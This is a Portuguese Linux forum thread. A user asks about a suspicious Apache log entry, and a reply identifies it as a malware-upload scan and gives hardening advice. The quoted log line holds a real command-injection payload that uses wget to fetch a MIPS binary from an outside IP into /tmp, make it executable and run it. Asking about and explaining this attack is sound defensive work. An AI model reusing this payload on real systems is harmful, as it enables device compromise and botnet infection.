Denuncie Favoritos Indicar

Log suspeito no apache! [RESOLVIDO]

1. Log suspeito no apache! [RESOLVIDO]

recscreen123
(usa Linux Mint)

Enviado em 23/07/2018 - 03:57h

Alguém ai sabe oque pode ser isso aqui?
118.83.9.179 - - [23/Jul/2018:03:30:43 -0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://178.128.11.199/qtx.mips%20-O%20-%3E%20/tmp/rz;chmod%20777%20/tmp/rz;/tmp/rz%27$ HTTP/1.1" 400 0 "-" "-"
acabei de encontrar no log do meu apache.

2. MELHOR RESPOSTA

pbonfanti
(usa Debian)

Enviado em 23/07/2018 - 08:46h

recscreen123 escreveu:

Alguém ai sabe oque pode ser isso aqui?
118.83.9.179 - - [23/Jul/2018:03:30:43 -0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://178.128.11.199/qtx.mips%20-O%20-%3E%20/tmp/rz;chmod%20777%20/tmp/rz;/tmp/rz%27$ HTTP/1.1" 400 0 "-" "-"
acabei de encontrar no log do meu apache.

Escaneamento verificando se é possivel fazer upload de algum malware e executar no seu servidor, pode ser um "shellshock atack". Aqui tem uma matéria em inglês demonstrando o ataque:

http://rajsadayeshellshock.blogspot.com/2016/11/shellshock-attack-using-metasploit.html

Atualize pacotes, bloqueie o IP e faça "hardening" do sistema.
E o aplicativo "lynis" citado na matéria acima é bastante útil.

https://www.tecmint.com/apache-security-tips/

Patrocínio

Site hospedado pelo provedor RedeHost.

Destaques

Atenção a quem posta conteúdo de dicas, scripts e tal (1)

Agora temos uma assistente virtual no fórum!!! (246)

Links importantes de usuários do VOL (3)

Artigos

Instalar certificado digital Safesign, fornecido pela Certisign e utilizado pela OAB-SP, em qualquer distribuição Linux usando distrobox

Manutenção de sistemas Linux Debian e derivados com apt-get, apt, aptitude e dpkg

Criatividade para TI parte 1

Melhorando o tempo de boot do Fedora e outras distribuições

Como instalar as extensões Dash To Dock e Hide Top Bar no Gnome 45/46

Dicas

Como Atualizar Fedora 39 para 40

Instalar Google Chrome no Debian e derivados

Consertando o erro do Sushi e Wayland no Opensuse Leap 15

Instalar a última versão do PostgreSQL no Lunix mantendo atualizado

Flathub na sua distribuição Linux e comandos básicos de gerenciamento

Tópicos

erro ao clonar repo github (3)

Clamav e suas atualizações (25)

Como adicionar módulo de saúde da bateria dos notebooks Acer ao kernel... (23)

instalar unionfs-fuse (4)

Quais Shell Scripts vocês usam? (15)

Top 10 do mês

Xerxes
1° lugar - 72.676 pts
Fábio Berbert de Paula
2° lugar - 58.032 pts
Clodoaldo Santos
3° lugar - 45.574 pts
Buckminster
4° lugar - 26.726 pts
Sidnei Serra
5° lugar - 26.373 pts
Daniel Lara Souza
6° lugar - 17.768 pts
Mauricio Ferrari
7° lugar - 17.391 pts
Alberto Federman Neto.
8° lugar - 17.360 pts
Diego Mendes Rodrigues
9° lugar - 15.436 pts
edps
10° lugar - 14.693 pts

Scripts

[Shell Script] Script para desinstalar pacotes desnecessários no OpenSuse

[Shell Script] Script para criar certificados de forma automatizada no OpenVpn

[Shell Script] Conversor de vídeo com opção de legenda

[C/C++] BRT - Bulk Renaming Tool

[Shell Script] Criação de Usuarios , Grupo e instalação do servidor de arquivos samba